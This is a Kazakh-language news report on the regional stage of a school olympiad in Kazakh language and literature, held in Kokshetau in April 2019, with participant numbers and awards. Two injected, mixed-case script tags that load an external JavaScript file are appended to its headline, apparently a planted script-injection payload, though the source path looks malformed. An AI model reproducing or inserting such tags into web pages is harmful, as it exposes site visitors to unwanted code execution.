Қазақ тілі мен әдебиетінен Қ. Бітібаева атындағы республикалық олимпиаданың облыстық кезеңі<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

16.04.2019

 2019 жылғы 3-5 сәуір аралығында Көкшетау қаласы,  дарынды балаларға арналған №3 облыстық мамандандырылған мектеп-интернатында Қанипа Бітібаева атындағы қазақ тілі мен әдебиеті пәнінен республикалық олимпиадасының облыстық кезеңі өтті.

 Олимпиада мақсаты − Қазақстан Республикасының дарынды оқушыларын анықтау, дамыту және қолдау көрсету, оқушылардың қазақ тілі мен әдебиеті пәндеріне деген қызығушылықтарын арттыру болып табылады.

 Олимпиаданың негізгі  міндеттері:

- оқушылардың  қазақ тілі мен әдебиеті бойынша білімдерін жетілдіру мен тереңдету;

- патриотизмді, азаматшылықты дамыту, ұлттық мәдениетке, дәстүрлерге деген құрметті дәріптеу;

- оқушылардың зияткерлік және шығармашылық қабілеттерін дамыту.

Олимпиадаға 9-11 сыныптарда оқитын Ақмола облысының 14 аудандарынан және Көкшетау, Степногорск қалаларынан және 4 мамандандырылған мектеп-интернаттарынан  жалпы 49 оқушы қатысты.

Олимпиада қорытындысы бойынша жеңімпаздар мен жүлдегерлер анықталды.

 Ақмола облысы білім басқармасының I дәрежелі дипломдарымен 3 оқушы, ІІ дәрежелі дипломдармен 9 оқушы, ІІІ дәрежелі дипломдармен 8 оқушы және грамотамен 4 оқушы марапатталды.

Сондай-ақ, 2019 жылғы 24-27 сәуір аралығында Олимпиаданың республикалық кезеңі Өскемен қаласында өтеді.

Республикалық  кезеңге I,  II дәрежелі дипломдармен марапатталған оқушылар қатысады.

Просмотров: 591


Пікір қосу



Деректерді қолтаңбаға қосу